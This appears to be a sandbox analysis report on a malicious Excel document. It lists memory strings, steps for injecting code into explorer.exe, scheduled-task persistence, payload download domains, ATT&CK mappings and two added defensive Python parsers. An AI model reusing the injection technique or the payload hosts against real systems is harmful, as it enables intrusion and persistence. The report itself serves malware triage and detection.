sa4z6n1L auPJMH7YxWGfGAKPHRkYBgeWmBS 8bIf YQbRHK0ItX4yv9jj75pmrfCBZ jMErQ0XLruojRO0GuTswkbmw2kKCf0x4yeonc7Zc5FnLoge3y0vNLZOo9HIXtBCN6ultKusR I2R0IJQGnjE2 KOVv ChafFhg BkutdWZN8AobZ04ULf51gQCZDl f0T7kITO93I7AFenDcT3bV4XtbRchg2a1rN,gC.aDJ c6zVdc9AvrQLskENN6KRY9qygrLHpGOMPXNoGBs486d Hwo4e5Sssz.3yZOI9L,Uo61UfBybeBlg4 Rgz0,,nlIquQIAbV 0MHezI6 S11ufn.a5V O.kXuFwX5RBhMRaiRtkrwwTO 1mb9oE6K0g3.hLvB8fRZhszZpl CDbTzIMNhhi KIrpyrQOhkz.vTSlNE0SNQtw6j7DgrVGZ0DLPR,l1sS91u4tBTNuSpH0bBLJN,frE71dckGTJNKb,i2irp6qLNYiLytoL8d34uAqq8xnDat Nht whBS27,tusBZSJnrYcP4F,Z uSdClmMOPupKE66fj3mv1omi86Y kj.u.p2S36vZH3d7P,Q2lR7EpgzCTeXQb PMTw hi81JJHFhyWcfLfSlN09M8,BqXDWGrSL3xneWj.7S1beot,Cta6gM6R7Y9Gg9AOIAkdoLuXh T eBWqzTP7yVBVKy,ktTNCbmNLkbiF ifON6kQO.ozJyyl8X3aSLU,dAnJHCuh8npN idxAB9mZIMXz489.fpBE3 lhCu V sBmy,E3q62GN qDfhthYBmSCFUMk1w4CLnhA8HloL p7
Source: rundll32.exe, 00000001.00000003.708454273.00000000049F0000.00000004.00000001.sdmp, explorer.exe, 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmpBinary or memory string: Y,1RD wIo9CisUqfsMkeXDnjkCM6x7OPiIYs45uwYAKn9icTIvF0bP,T 5rB0cdpTxaH2HesJNLLn TK2UpWHNCb Mo0Mm rvwcHcahwiECJy78 42fw,Ljlpqnc zujROhdTeIghS337dpUbprjWnOr7M1J m olOZ4Wzo3O1bnCd.iRCSrH9CrNl4texufrAyw7t.rPJjyPv,F.XwLCBtbeOFQTaniStQ7iwTULoe4D28qxZ.g,kuvWFs,bV0FGZ.qXFgHnCKam1umGxt qEOHWhlBsghltNOMiYw4OxB0Mx5,djYw8 c6J9HszqYgNo4rUKcBuInlww2dVZPrTLOB5epoH7KhxbsrFKiWmF p x5 aPsfvZJgseWuDReU AZVXgHwYwWy6zurmGHK 1MQbmh.xY4, sa,,9ck6zN115PhqjiFTrXqDJau kXfsRReJ1hm9hsppgK1KWdsAFd1KnJqSmStaPbsxhOpr QdoDpp4ue63uCjO KY7ZugJx,sPrPL6RVs386 y3Ge9XV80fWP8zgbA7,5nL iOSOVEzJDP8ZaWZV.zkudHHb9r,iSl,xRpeHd5pToPWiQ6i 4 AqQpNzV5A1yOUxlc RJBl8b.X g4dT8Uxb5TL3xFj,jb6KE0LS.akyXdiy3u2zQqx6LprAJ0t6kq6Oor igyA9aeC5afvURZYJEVzWi4.csZbmmwOibe.J9FFbqIAbHDNFKKgU zkvKK 5PeYYtuhiiH 74PsW54ONG1e5WYv2mWsCccHDRq,NfME0 MwzkLy4zSVxtXOX2pZq8YCv,ROiR q7VfgfHxqTmA6WY1mlD0HXjNCfOb6vyllPBPEMiLFZdEXzs 1T.nFcbWOKfnvYDaw5Vkfi5FBLeVLqyqxvcsh bhscvE8p7..ULJuM604b Rd54 0PYyEVjDdKjzUiAROCgzCVMoG9PONTnt9qEu19KBHJSpbIRWIvf kN3SFwtr.XEp1tILfpnBfMFqKt4WLb50FTTVLt4M b7.m1ZmkKD,pkxW fHrVAjo2. 
6SwsdaXzkA.CKDL3j s3O1z8UPh0YUlkr90WncXE w5rwEA.R7RSpb47DeqPalCETu8K0al 5cR7 l, 7WxGjQklcCwoqKJuhxsH daTEU9f14p72oHUpgvPhEaVliQXM6VgVg6R6WXewmhXMYs6yx G7yy9,xTBbxX7J pW4zlpHlXjeUhrkM1Vz9sryvMbw71m xN 10acxSXe3lT14gLEESCQWS9yZNWw,2GyT,kSQTHK9do1mOEFCsfZf3gYuv2ZlQFEPXeKmueC4K SFPgIV,.6Av9Ng4xakKEfWJ9yU,WrWR6RvCzWEtDkevmAiCzxc8RcUZKdOO vIObfbAO,gPcJbpstImpOpvMsuyCQi4GSLiRER9V8LwVWESgCB0J sv7Q nWLw cdPNvA3 bpQ,BZ sz1W2,ZjWtWe3dLmKA5009 3ADGEg2c ZpQ3AzTkDLpFYec3qrZ94Lq2stkpuxqa2g F8vtY2Vfv.4RBfoCk5dzmhVlURJPbUMQt56frGzfKufOt8tw Lmh,V5m2rmIS9hPz8 xH04tyzMWlXgXCU1V6 UwN6VfZnAzb,HJ2iz684SkZyBQwcC6StS2kcBdRbg6ug0mp92S.EZC0 2lbDpEgYs Hv0tVB RtmA cw3mueFkSBT7FZm3MIp,IAYCbyXN00dAN,,D2GerUbUp,Kgh0NMXq1JLHkNSS1cmyPaK 5m XnkF017So1lk1qniL1MQqNqt r,BYdAa8PLGFojSzaCK2j vHcVrMn,C HHtsvcz83i,cYwqk YhUQvYQzUZ3QrHB,7eX2ONOatZF9oakljHMXEmqOUiI3.LozHMlR2UD.,SK.d38gb6jnLP3erw HNx FBdmw1SRB8 qN jC7q,yl 0IZP,V54LCMFMoafYheNTH qCZ,MCsa7YOysI5c 3B fqS7MIX0hpvyp,PdomJKehpsvIr,XZ5YJUOM U0Hj40pHuUCNDfvAshYYHbC1.YjTojwfb NBXpeRexTGkg NMYiPlrbZ8Ng zNRoZa5Z8AU 2Pi2nC3VR5qBWqKY4EciMgTP Ing38Uz ZosXF9C7zWBk lUSeXQ1 QJKwV1VfVo3XjVDC8t71.8ywNQsBGuZ2pXtUcO2LN1EZDCZp4POm0n22TvYdS0SNuf SqlzYPF9dXjJPLfl3IbAxGcMBAo3XCbFuupSA6iGQxF,jj9qD7ATPbNd1dlZ sc4 gL72EFjlMMxbxpjuOkrPQOMz8mdgJn,n1tQ,HaGGIbxGq1mdYou2YGqPZWCT,KKcAgUfYOEoWzCyq6MVQ QO32E5W Ht ,6u rIijoW5UHsY44Dv8OIwIGvo5DKHyoPVPF9 pWgolBaD48GaSjYdrJULsCXFo53SZK6RJalbaCXn nqd8nL7Mv5dIX0uGBVYxEKrOfIN4YHgFs9mXmXuu1.mYNZJN4C vx.PdpTtn. P qo0htjwco,ACo8diUf9TT f7iMrqZsNr0RUhYzBpFSxDkC69 7Y9YE.0GQz WA82adj4,yqdfpe2AWEKITH3slwt,0DSFeYaSDCwu4AmS65aNr.XFo,Kyl87ylLl pROrZ bUzFosWZ. cQRY PXMUKyxPDYte LpPkHuB v.lt3Ne6XNVo07qHFGkGGpc,xoQo L s6.Ru9NHx5CCzU t,X39p o3aLKI9l8DXjhWDiNgT x NEE1 sa4z6n1L auPJMH7YxWGfGAKPHRkYBgeWmBS 8bIf YQbRHK0ItX4yv9jj75pmrfCBZ jMErQ0XLruojRO0GuTswkbmw2kKCf0x4yeonc7Zc5FnLoge3y0vNLZOo9HIXtBCN6ultKusR I2R0IJQGnjE2 KOVv ChafFhg BkutdWZN8AobZ04ULf51gQCZDl f0T7kITO93I7AFenDcT3bV4XtbRchg2a1rN,gC
Source: explorer.exeBinary or memory string: IijoW5UHsY44Dv8OIwIGvo5DKHyoPVPF9 pWgolBaD48GaSjYdrJULsCXFo53SZK6RJalbaCXn nqd8nL7Mv5dIX0uGBVYxEKrOfIN4YHgFs9mXmXuu1.mYNZJN4C vx.PdpTtn. P qo0htjwco,ACo8diUf9TT f7iMrqZsNr0RUhYzBpFSxDkC69 7Y9YE.0GQz WA82adj4,yqdfpe2AWEKITH3slwt,0DSFeYaSDCwu4AmS65aNr.XFo,Kyl87
Source: rundll32.exe, 00000006.00000002.723729637.0000000004B10000.00000002.00000001.sdmp, WerFault.exe, 0000000F.00000002.750050329.0000000003CA0000.00000002.00000001.sdmp, WerFault.exe, 0000001B.00000002.898444696.00000000039B0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: rundll32.exe, 00000006.00000002.723729637.0000000004B10000.00000002.00000001.sdmp, WerFault.exe, 0000000F.00000002.750050329.0000000003CA0000.00000002.00000001.sdmp, WerFault.exe, 0000001B.00000002.898444696.00000000039B0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 00000006.00000002.723729637.0000000004B10000.00000002.00000001.sdmp, WerFault.exe, 0000000F.00000002.750050329.0000000003CA0000.00000002.00000001.sdmp, WerFault.exe, 0000001B.00000002.898444696.00000000039B0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\regsvr32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00ED03CA LoadLibraryA,GetProcAddress,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_01054795 mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00EC32C4 RtlAddVectoredExceptionHandler,

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: F00000 protect: page read and write
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6480 base: F00000 value: 9C
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6480 base: 113F380 value: E9
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: F00000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 113F380
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
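The findings above give the injection step by step: rundll32.exe starts explorer.exe (PID 6480), allocates a read/write region at F00000 in it, writes a stub there whose first byte 9C is pushfd, maps an execute/read/write section into the process, and finally overwrites five bytes at 113F380 with E9 A2 43 D8 FF, a relative JMP. Because E9 takes a signed 32-bit displacement measured from the end of the instruction, the write alone tells you where the hooked code is redirected. The Python below is an added example, not code from the report or from the sample: it parses these findings, decodes the JMP and checks whether the target lands in a region the injector created. The region size is an assumption (the report gives bases, not sizes), and treating the report's explorer.exe memory dump at 0xEC0000 (the 00000040 in its name is PAGE_EXECUTE_READWRITE) as the mapped image is an interpretation; under those assumptions the hook resolves to 0x00EC3727, inside that image, which is the range the report's 5_2_00EC... and 5_2_00ED... code functions occupy.

```python
import re
import struct

# Constructed input: the injection findings copied from this section of the report.
INJECTION_FINDINGS = [
    "Source: C:\\Windows\\SysWOW64\\rundll32.exe Memory allocated: C:\\Windows\\SysWOW64\\explorer.exe base: F00000 protect: page read and write",
    "Source: C:\\Windows\\SysWOW64\\rundll32.exe Memory written: PID: 6480 base: F00000 value: 9C",
    "Source: C:\\Windows\\SysWOW64\\rundll32.exe Memory written: PID: 6480 base: 113F380 value: E9 A2 43 D8 FF",
]

# ASSUMPTION: the report gives region bases but not sizes; 128 KiB covers the code functions it lists.
ASSUMED_REGION_SIZE = 0x20000
# Base of the RWX dump 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp taken
# from explorer.exe; interpreting it as the mapped injected image is this example's assumption.
MAPPED_IMAGE_BASE = 0x00EC0000

_ALLOC = re.compile(r"Memory allocated: (\S+) base: ([0-9A-Fa-f]+) protect: (.+)$")
_WRITE = re.compile(r"Memory written: PID: (\d+) base: ([0-9A-Fa-f]+) value: ((?:[0-9A-Fa-f]{2}\s?)+)")


def foreign_regions(lines):
    """Regions inside the target that the injector created: {name: (base, size)}."""
    regions = {"mapped RWX image": (MAPPED_IMAGE_BASE, ASSUMED_REGION_SIZE)}
    for line in lines:
        m = _ALLOC.search(line)
        if m:
            target_exe = m.group(1).rsplit("\\", 1)[-1]
            name = "allocation in " + target_exe + " (" + m.group(3) + ")"
            regions[name] = (int(m.group(2), 16), ASSUMED_REGION_SIZE)
    return regions


def parse_writes(lines):
    """(pid, address, bytes) for every 'Memory written' finding that carries bytes."""
    writes = []
    for line in lines:
        m = _WRITE.search(line)
        if m:
            writes.append((int(m.group(1)), int(m.group(2), 16),
                           bytes.fromhex(m.group(3).replace(" ", ""))))
    return writes


def jmp_rel32_target(address, code):
    """Absolute target of a 5-byte E9 rel32 JMP placed at `address`, or None if the bytes are not one."""
    if len(code) < 5 or code[0] != 0xE9:
        return None
    rel, = struct.unpack("<i", code[1:5])     # signed displacement from the end of the instruction
    return (address + 5 + rel) & 0xFFFFFFFF   # 32-bit (SysWOW64) process, so wrap at 4 GiB


def region_of(address, regions):
    """Name of the foreign region containing `address`, or None."""
    for name, (base, size) in regions.items():
        if base <= address < base + size:
            return name
    return None


def resolve_hooks(lines):
    """[(pid, hook_address, target, region_name)] for each E9 write; region_name is None if not foreign."""
    regions = foreign_regions(lines)
    hooks = []
    for pid, addr, code in parse_writes(lines):
        target = jmp_rel32_target(addr, code)
        if target is not None:
            hooks.append((pid, addr, target, region_of(target, regions)))
    return hooks


if __name__ == "__main__":
    for pid, addr, target, region in resolve_hooks(INJECTION_FINDINGS):
        print(f"PID {pid}: JMP at 0x{addr:08X} -> 0x{target:08X} ({region or 'not in a known foreign region'})")
```

The same parser works on 'Memory written' events from an EDR or from the sandbox's JSON export; a JMP whose target lies in memory that a different process allocated or mapped is the cross-process hook the report's signature describes, and the target region is what to dump next.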
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00ECE47B LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,
Source: explorer.exe, 00000005.00000002.985787421.0000000003A00000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000002.985787421.0000000003A00000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000002.985787421.0000000003A00000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000005.00000002.985787421.0000000003A00000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00ECE0AF GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00ED70DA LookupAccountNameW,LookupAccountNameW,LookupAccountNameW,Sleep,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00ECF5F1 GetCurrentProcess,GetModuleFileNameW,memset,GetVersionExA,GetCurrentProcessId,

Mitre Att&ck Matrix

The matrix is listed here per tactic. Entries followed by a number in brackets are the techniques the report matched, with the report's hit counter; the remaining entries are the unmatched cells of the matrix.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Scheduled Task/Job [1]; Scripting [21]; Native API [1]; Exploitation for Client Execution [33]; Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: Scheduled Task/Job [1]; DLL Side-Loading [1]; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection [412]; Scheduled Task/Job [1]; DLL Side-Loading [1]; Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading [131]; Disable or Modify Tools [1]; Virtualization/Sandbox Evasion [2]; Process Injection [412]; Scripting [21]; Obfuscated Files or Information [1]; Rundll32 [1]; DLL Side-Loading [1]
Credential Access: Credential API Hooking [1]; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery [1]; Security Software Discovery [11]; Virtualization/Sandbox Evasion [2]; Process Discovery [1]; Account Discovery [1]; System Owner/User Discovery [1]; File and Directory Discovery [2]; System Information Discovery [15]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
Collection: Credential API Hooking [1]; Archive Collected Data [1]; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel [12]; Non-Application Layer Protocol [1]; Application Layer Protocol [2]; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Behavior Graph ID: 412182, Sample: 9659e9a8_by_Libranalysis.xls, Start date: 12/05/2021, Architecture: WINDOWS, Score: 100

Signatures on the sample node: Malicious sample detected (through community Yara rule); Document exploit detected (drops PE files); Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros); 6 other signatures

Process tree as drawn in the graph (the numbers in brackets are the per-node counters shown next to each process; see the legend):

EXCEL.EXE [40 52]
    DNS/IP: fcventasyservicios.cl 192.185.32.232:443 (local port 49734), UNIFIEDLAYER-AS-1US, United States
    DNS/IP: signifysystem.com 192.185.39.58:443 (local port 49729), UNIFIEDLAYER-AS-1US, United States
    Dropped: C:\Users\user\AppData\Local\...\ue[1].htm (PE32)
    Signature: Document exploit detected (UrlDownloadToFile)
    -> rundll32.exe
        Signatures: Overwrites code with unconditional jumps - possibly setting hooks in foreign process; Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; 2 other signatures
        -> explorer.exe [8 1]
            Dropped: C:\Users\user\ritofm.cvm (PE32)
            Signatures: Drops PE files to the user root directory; Uses schtasks.exe or at.exe to add and modify task schedules
            -> schtasks.exe [1]
                -> conhost.exe
    -> rundll32.exe
regsvr32.exe
    -> regsvr32.exe
        -> WerFault.exe [20 9]
regsvr32.exe
    -> regsvr32.exe
        -> WerFault.exe [9]

Screenshots


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
9659e9a8_by_Libranalysis.xls | 4% | ReversingLabs | 

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\ritofm.cvm | 100% | Joe Sandbox ML | 
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ue[1].htm | 100% | Joe Sandbox ML | 
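Both dropped files are classified PE32 although neither carries an executable extension: ue[1].htm is the IE cache name for the downloaded payload and ritofm.cvm is the copy explorer.exe wrote to the user directory. The check behind that classification is small enough to carry in a triage script: ignore the name, read the MZ stub, follow e_lfanew to the PE signature, and read the COFF Machine field. The block below is an added example, not code from the Joe Sandbox report; its inputs are constructed byte strings (a minimal synthetic MZ/PE header and an HTML fragment) standing in for the real dropped files, which are not reproduced here.

```python
"""Decide whether a dropped file is a PE image no matter what extension it
carries, the check behind the 'content does not match file extension'
finding for ue[1].htm and ritofm.cvm.

Added example, not part of the Joe Sandbox report. The inputs below are
constructed byte strings (a minimal synthetic MZ/PE header and an HTML
fragment), not the real dropped files.
"""
import struct

PE_EXTENSIONS = {".exe", ".dll", ".sys", ".ocx", ".scr", ".cpl", ".drv", ".efi"}
MACHINE_NAMES = {0x14C: "PE32 (i386)", 0x8664: "PE32+ (x64)", 0xAA64: "PE32+ (ARM64)"}


def is_pe(data):
    """True when data starts with an MZ stub whose e_lfanew (offset 0x3C)
    points at a 'PE\\0\\0' signature and a full 20-byte COFF header."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data):          # signature (4) + COFF header (20)
        return False
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def pe_machine(data):
    """Human-readable COFF Machine field; caller must have checked is_pe()."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    machine = struct.unpack_from("<H", data, e_lfanew + 4)[0]
    return MACHINE_NAMES.get(machine, hex(machine))


def extension(name):
    return "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""


def extension_mismatch(name, data):
    """True when the content is PE but the name does not claim to be one."""
    return is_pe(data) and extension(name) not in PE_EXTENSIONS


def build_fake_pe(machine=0x14C):
    """Constructed 88-byte MZ stub + PE signature + COFF header: enough to
    exercise the parser, not a loadable image."""
    dos = bytearray(b"MZ" + b"\x00" * 0x3E)          # 64-byte DOS header
    struct.pack_into("<I", dos, 0x3C, 0x40)           # e_lfanew -> 0x40
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, 0, 0x0102)
    return bytes(dos) + b"PE\x00\x00" + coff


# Constructed inputs standing in for the report's dropped files.
SAMPLES = {
    "ue[1].htm":  build_fake_pe(0x14C),
    "ritofm.cvm": build_fake_pe(0x14C),
    "index.htm":  b"<html><body>not an executable</body></html>",
}


def triage(samples):
    """{name: machine string} for every sample whose content and extension disagree."""
    return {n: pe_machine(d) for n, d in samples.items() if extension_mismatch(n, d)}


if __name__ == "__main__":
    for name, kind in triage(SAMPLES).items():
        print(f"{name}: {kind} content behind a non-PE extension")
```

The bounds check on e_lfanew matters in practice: a truncated download (the IE cache often holds partial files) or a deliberately oversized e_lfanew would otherwise raise on the slice or signature read instead of returning False.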

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label
signifysystem.com | 0% | Virustotal | 
fcventasyservicios.cl | 0% | Virustotal | 

URLs

Source | Detection | Scanner | Label
https://cdn.entity. | 0% | URL Reputation | safe
https://powerlift.acompli.net | 0% | URL Reputation | safe
https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe
https://cortana.ai | 0% | URL Reputation | safe
https://api.aadrm.com/ | 0% | URL Reputation | safe
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | Virustotal | 
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | Avira URL Cloud | safe
https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe
https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe
https://officeci.azurewebsites.net/api/ | 0% | Avira URL Cloud | safe
https://store.office.cn/addinstemplate | 0% | URL Reputation | safe
https://store.officeppe.com/addinstemplate | 0% | URL Reputation | safe
https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe
https://www.odwebp.svc.ms | 0% | URL Reputation | safe
https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe
https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe
https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe
https://ncus.contentsync. | 0% | URL Reputation | safe
https://apis.live.net/v5.0/ | 0% | URL Reputation | safe
https://wus2.contentsync. | 0% | URL Reputation | safe
https://asgsmsproxyapi.azurewebsites.net/ | 0% | Avira URL Cloud | safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | 0% | URL Reputation | safe
https://ncus.pagecontentsync. | 0% | URL Reputation | safe
https://skyapi.live.net/Activity/ | 0% | URL Reputation | safe
https://dataservice.o365filtering.com | 0% | URL Reputation | safe
https://api.cortana.ai | 0% | URL Reputation | safe
https://ovisualuiapp.azurewebsites.net/pbiagave/ | 0% | Avira URL Cloud | safe
https://directory.services. | 0% | URL Reputation | safe
https://staging.cortana.ai | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
signifysystem.com | 192.185.39.58 | true | false | | unknown
fcventasyservicios.cl | 192.185.32.232 | true | false | | unknown

URLs from Memory and Binaries

Source for every row: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr. Malicious: false for every row.

Name | Antivirus Detection | Reputation
https://api.diagnosticssdf.office.com | | high
https://login.microsoftonline.com/ | | high
https://shell.suite.office.com:1443 | | high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize | | high
https://autodiscover-s.outlook.com/ | | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr | | high
https://cdn.entity. | URL Reputation: safe | unknown
https://api.addins.omex.office.net/appinfo/query | | high
https://clients.config.office.net/user/v1.0/tenantassociationkey | | high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ | | high
https://powerlift.acompli.net | URL Reputation: safe | unknown
https://rpsticket.partnerservices.getmicrosoftkey.com | URL Reputation: safe | unknown
https://lookup.onenote.com/lookup/geolocation/v1 | | high
https://cortana.ai | URL Reputation: safe | unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | | high
https://cloudfiles.onenote.com/upload.aspx | | high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | | high
https://entitlement.diagnosticssdf.office.com | | high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy | | high
https://api.aadrm.com/ | URL Reputation: safe | unknown
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% Virustotal; Avira URL Cloud: safe | unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies | | high
https://api.microsoftstream.com/api/ | | high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive | | high
https://cr.office.com | | high
https://portal.office.com/account/?ref=ClientMeControl | | high
https://ecs.office.com/config/v2/Office | | high
https://graph.ppe.windows.net | | high
https://res.getmicrosoftkey.com/api/redemptionevents | URL Reputation: safe | unknown
https://powerlift-frontdesk.acompli.net | URL Reputation: safe | unknown
https://tasks.office.com | | high
https://officeci.azurewebsites.net/api/ | Avira URL Cloud: safe | unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work | | high
https://store.office.cn/addinstemplate | URL Reputation: safe | unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid= | | high
https://globaldisco.crm.dynamics.com | | high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | | high
https://store.officeppe.com/addinstemplate | URL Reputation: safe | unknown
https://dev0-api.acompli.net/autodetect | URL Reputation: safe | unknown
https://www.odwebp.svc.ms | URL Reputation: safe | unknown
https://api.powerbi.com/v1.0/myorg/groups | | high
https://web.microsoftstream.com/video/ | | high
https://graph.windows.net | | high
https://dataservice.o365filtering.com/ | URL Reputation: safe | unknown
https://officesetup.getmicrosoftkey.com | URL Reputation: safe | unknown
https://analysis.windows.net/powerbi/api | | high
https://prod-global-autodetect.acompli.net/autodetect | URL Reputation: safe | unknown
https://outlook.office365.com/autodiscover/autodiscover.json | | high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios | | high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | | high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json | | high
https://ncus.contentsync. | URL Reputation: safe | unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false | | high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ | | high
http://weather.service.msn.com/data.aspx | | high
https://apis.live.net/v5.0/ | URL Reputation: safe | unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks | | high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios | | high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml | | high
https://management.azure.com | | high
https://wus2.contentsync. | URL Reputation: safe | unknown
https://incidents.diagnostics.office.com | | high
https://clients.config.office.net/user/v1.0/ios | | high
https://insertmedia.bing.office.net/odc/insertmedia | | high
https://o365auditrealtimeingestion.manage.office.com | | high
https://outlook.office365.com/api/v1.0/me/Activities | | high
https://api.office.net | | high
https://incidents.diagnosticssdf.office.com | | high
https://asgsmsproxyapi.azurewebsites.net/ | Avira URL Cloud: safe | unknown
https://clients.config.office.net/user/v1.0/android/policies | | high
https://entitlement.diagnostics.office.com | | high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json | | high
https://outlook.office.com/ | | high
https://storage.live.com/clientlogs/uploadlocation | | high
https://templatelogging.office.com/client/log | | high
https://outlook.office365.com/ | | high
https://webshell.suite.office.com | | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive | | high
https://management.azure.com/ | | high
https://login.windows.net/common/oauth2/authorize | | high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | URL Reputation: safe | unknown
https://graph.windows.net/ | | high
https://api.powerbi.com/beta/myorg/imports | | high
https://devnull.onenote.com | | high
https://ncus.pagecontentsync. | URL Reputation: safe | unknown
